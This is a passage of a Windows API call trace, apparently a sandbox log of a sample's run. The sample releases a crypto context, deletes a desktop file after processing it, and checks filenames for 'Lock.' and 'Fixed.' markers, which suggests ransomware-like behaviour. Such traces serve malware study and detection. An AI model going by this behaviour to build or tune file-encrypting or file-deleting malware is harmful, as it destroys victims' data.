Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.103] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.103] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0147.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0147.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0147.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0147.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0147.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0147.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0147.106] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0147.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0147.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0147.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0147.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0147.107] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0147.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0147.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0147.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0147.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0147.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0147.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0147.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0147.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0147.108] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.108] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0147.108] FreeLibrary (hLibModule=0x756e0000) returned 1 [0147.108] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.108] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.108] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.108] CloseHandle (hObject=0x2d0) returned 1 [0147.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.110] CloseHandle (hObject=0x2a0) returned 1 [0147.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.228] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.228] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0147.228] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Dh6CM5.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Dh6CM5.flv", lpFilePart=0x8cedf4*="Dh6CM5.flv") returned 0x22 [0147.229] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Dh6CM5.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\dh6cm5.flv")) returned 0x20 [0147.229] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Dh6CM5.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69416410, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x2034f840, ftLastAccessTime.dwHighDateTime=0x1d5ef42, ftLastWriteTime.dwLowDateTime=0x2034f840, ftLastWriteTime.dwHighDateTime=0x1d5ef42, nFileSizeHigh=0x0, nFileSizeLow=0x13c4e, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Dh6CM5.flv", cAlternateFileName="")) returned 0xa87510 [0147.229] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Dh6CM5.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\dh6cm5.flv")) returned 1 [0147.323] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69416410, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x2034f840, ftLastAccessTime.dwHighDateTime=0x1d5ef42, ftLastWriteTime.dwLowDateTime=0x2034f840, ftLastWriteTime.dwHighDateTime=0x1d5ef42, nFileSizeHigh=0x0, nFileSizeLow=0x13c4e, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Dh6CM5.flv", cAlternateFileName="")) returned 0 [0147.323] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0147.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0147.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0147.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0147.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0147.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0147.323] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0147.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0147.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0147.323] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0147.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0147.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e563a8 [0147.324] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Dh6CM5.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Dh6CM5.flv", lpFilePart=0x8cf650*="Dh6CM5.flv") returned 0x22 [0147.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0147.324] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Dh6CM5.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\dh6cm5.flv")) returned 0xffffffff [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0147.325] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0147.325] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.325] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0147.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0147.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0147.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0147.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0147.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0147.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-SkW-EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-SkW-EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkW-EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kW-EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W-EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EYmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YmoA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="moA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oA5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0147.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0147.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0147.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0147.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0147.327] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0147.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0147.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0147.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-SkW-EYmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-SkW-EYmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkW-EYmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kW-EYmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W-EYmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-EYmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EYmoA5t.bmp", 